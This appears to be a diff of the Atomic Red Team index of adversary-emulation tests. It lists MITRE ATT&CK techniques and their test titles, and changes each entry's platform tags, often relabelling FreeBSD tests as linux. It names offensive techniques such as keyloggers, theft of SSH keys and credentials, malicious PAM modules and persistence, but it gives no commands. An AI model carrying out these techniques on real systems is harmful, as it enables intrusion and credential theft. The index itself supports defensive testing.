- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
@@ -1059,9 +1059,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Add command to .shrc [freebsd]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
@@ -1098,11 +1098,11 @@
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [freebsd]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [freebsd]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1128,7 +1128,7 @@
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
@@ -1144,11 +1144,11 @@
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1201,9 +1201,9 @@
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1271,22 +1271,22 @@
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- Atomic Test #2: Command-Line Interface [linux, macos]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [freebsd, linux]
- Atomic Test #6: What shell is running [freebsd, linux]
- Atomic Test #7: What shells are available [freebsd, linux]
- Atomic Test #8: Command line scripts [freebsd, linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Obfuscated command line scripts (freebsd) [freebsd]
- Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
- Atomic Test #11: Change login shell [linux]
- Atomic Test #12: Change login shell (freebsd) [freebsd]
- Atomic Test #12: Change login shell (freebsd) [linux]
- Atomic Test #13: Environment variable scripts [linux]
- Atomic Test #14: Environment variable scripts (freebsd) [freebsd]
- Atomic Test #14: Environment variable scripts (freebsd) [linux]
- Atomic Test #15: Detecting pipe-to-shell [linux]
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [freebsd]
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
- Atomic Test #17: Current kernel information enumeration [linux]
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
@@ -1301,10 +1301,10 @@
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux]
- Atomic Test #2: Execute Python via scripts [freebsd, linux]
- Atomic Test #3: Execute Python via Python executables [freebsd, linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux]
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts [linux]
- Atomic Test #3: Execute Python via Python executables [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
@@ -1333,7 +1333,7 @@
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1357,7 +1357,7 @@
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1394,9 +1394,9 @@
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
@@ -1425,9 +1425,9 @@
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1473,21 +1473,21 @@
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [freebsd]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [freebsd]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a FreeBSD system [freebsd]
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
- Atomic Test #3: Create a user account on a MacOS system [macos]
- Atomic Test #4: Create a new user in a command prompt [windows]
- Atomic Test #5: Create a new user in PowerShell [windows]
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [freebsd]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
- Atomic Test #8: Create a new Windows admin user [windows]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1503,7 +1503,7 @@
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
@@ -1623,9 +1623,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Add command to .shrc [freebsd]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
@@ -1670,12 +1670,12 @@
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [freebsd]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [freebsd]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1703,7 +1703,7 @@
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
@@ -1719,11 +1719,11 @@
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1733,7 +1733,7 @@
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [freebsd]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- Atomic Test #3: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
@@ -1785,11 +1785,11 @@
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- Atomic Test #5: Tor Proxy Usage - FreeBSD [freebsd]
- Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1806,14 +1806,14 @@
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
@@ -1821,7 +1821,7 @@
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [freebsd, linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
@@ -1840,7 +1840,7 @@
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
- Atomic Test #1: Connection Proxy [linux, macos]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1855,17 +1855,17 @@
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: X Windows Capture (freebsd) [freebsd]
- Atomic Test #4: X Windows Capture (freebsd) [linux]
- Atomic Test #5: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [freebsd]
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux]
- Atomic Test #7: Windows Screencapture [windows]
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1873,8 +1873,8 @@
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Logging sh history to syslog/messages [freebsd]
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
- Atomic Test #4: Logging sh history to syslog/messages [linux]
- Atomic Test #5: Bash session based keylogger [linux]
- Atomic Test #6: SSHD PAM keylogger [linux]
- Atomic Test #7: Auditd keylogger [linux]
- Atomic Test #8: MacOS Swift Keylogger [macos]
@@ -1890,7 +1890,7 @@
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [freebsd]
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
- Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
@@ -1913,10 +1913,10 @@
- [T1005 Data from Local System](../../T1005/T1005.md)
- Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows]
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
@@ -2010,14 +2010,14 @@
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Logging sh history to syslog/messages [freebsd]
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
- Atomic Test #4: Logging sh history to syslog/messages [linux]
- Atomic Test #5: Bash session based keylogger [linux]
- Atomic Test #6: SSHD PAM keylogger [linux]
- Atomic Test #7: Auditd keylogger [linux]
- Atomic Test #8: MacOS Swift Keylogger [macos]
@@ -2028,7 +2028,7 @@
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- Atomic Test #7: SUDO Brute Force - FreeBSD [freebsd]
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -2066,13 +2066,13 @@
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [freebsd]
- Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux]
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
- Atomic Test #3: Dump individual process memory with Python (Local) [linux]
- Atomic Test #4: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
- Atomic Test #5: Windows Internal Packet Capture [windows]
@@ -2080,8 +2080,8 @@
- Atomic Test #7: Windows Internal pktmon set filter [windows]
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
@@ -2131,13 +2131,13 @@
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [freebsd]
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux]
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [freebsd]
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [freebsd]
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
- Atomic Test #9: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #10: ADFS token signing and encryption certificates theft - Remote [windows]
- Atomic Test #11: CertUtil ExportPFX [windows]
@@ -2181,14 +2181,14 @@
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- Atomic Test #2: Search Through sh History [freebsd]
- Atomic Test #2: Search Through sh History [linux]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
